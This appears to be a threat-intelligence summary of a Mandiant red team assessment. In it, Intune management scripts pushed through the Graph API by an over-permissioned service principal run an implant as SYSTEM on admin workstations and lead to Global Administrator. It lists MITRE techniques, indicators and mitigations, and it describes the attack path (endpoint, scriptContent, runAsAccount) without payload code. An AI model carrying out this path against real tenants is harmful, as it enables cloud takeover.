Keypoints
- Mandiant Red Team assessed a client’s Microsoft Entra ID tenant and simulated an advanced compromise.
- They abused a service principal granted DeviceManagementConfiguration.ReadWrite.All to modify Intune device management scripts.
- Intune management scripts run at startup as NT AUTHORITYSYSTEM, enabling high-privilege code execution on PAWs.
- Mandiant used the Graph API to create or patch management scripts (scriptContent in Base64) to deploy a command-and-control implant.
- The attacker waited for privileged role activation and impersonated the admin (e.g., via cookie/token theft) to obtain Global Administrator rights.
- Recommended mitigations: review sensitive permissions, require multiple admin approvals for Intune changes, enable Graph API logging, and monitor service principal sign-ins.
MITRE Techniques
- [T1068] Privilege Escalation – Used Intune-managed script execution on PAWs to escalate and ultimately obtain Global Administrator privileges; quote: ‘obtained privileges in the Entra ID tenant to add credentials to Entra ID service principals.’
- [T1071] Command and Control – Deployed a remote implant to execute arbitrary commands on PAWs; quote: ‘By launching a command-and-control implant, Mandiant could execute arbitrary commands on the PAWs.’
- [T1003] Credential Dumping – Credential access techniques are referenced as part of account compromise and token/cookie theft; quote: ‘Obtains credentials from operating systems and software.’
- [T1098] Account Manipulation – Modified service principal credentials and permissions to gain unauthorized access; quote: ‘microsoft.directory/servicePrincipals/credentials/update.’
- [T1210] Exploitation of Remote Services – Leveraged remote management capabilities (Intune/Graph API) to push and execute malicious scripts on managed devices; quote: ‘Intune’s device management scripts … are executed when the device starts, with administrative privileges (NT AUTHORITYSYSTEM).’
Indicators of Compromise
- [API endpoint / Domain] Microsoft Graph API usage for script modification – example: https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/<script id> (used to create/patch Intune management scripts)
- [Script artifact / File name] Intune management script content and file name – example field: “scriptContent”: “<PowerShell script in base64 encoding>”, “fileName”: “<filename>” (used to deliver and execute payload as SYSTEM)
- [Permission / OAuth scope] Abused service principal permission – example: DeviceManagementConfiguration.ReadWrite.All (granted to a service principal that modified management scripts)
Mandiant Red Team showed a realistic attack path that bypasses an otherwise well-architected separation between on-premises and cloud administration. In the assessed environment, administrators used Intune-managed, cloud-native Privileged Access Workstations (PAWs) and dedicated cloud admin accounts, but a service principal holding DeviceManagementConfiguration.ReadWrite.All allowed modification of Intune management scripts via the Microsoft Graph API. Because Intune management scripts run at startup as NT AUTHORITYSYSTEM, a malicious script pushed this way executed with high privileges on PAWs.
The Red Team used Graph API PATCH requests to create or update deviceManagement scripts (providing Base64-encoded PowerShell in the scriptContent field and setting runAsAccount to system), deployed a command-and-control implant, and waited for a privileged administrator to activate an Entra ID role—then abused tokens/cookies to impersonate that admin and obtain Global Administrator privileges. Common Graph permissions that can lead to similar outcomes (RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All, Application.ReadWrite.All) were noted as sensitive even if not present in this tenant.
Mandiant recommends immediate steps: treat DeviceManagementConfiguration.ReadWrite.All as a sensitive permission and review service principals granted it; enable Intune Access Policies to require a second administrator’s approval for changes; enable Microsoft Graph API activity logs for detection; leverage Workload ID Premium features to restrict service principal usage to trusted locations and enable risk detections; and proactively monitor service principal sign-ins to detect anomalies and trigger rapid response.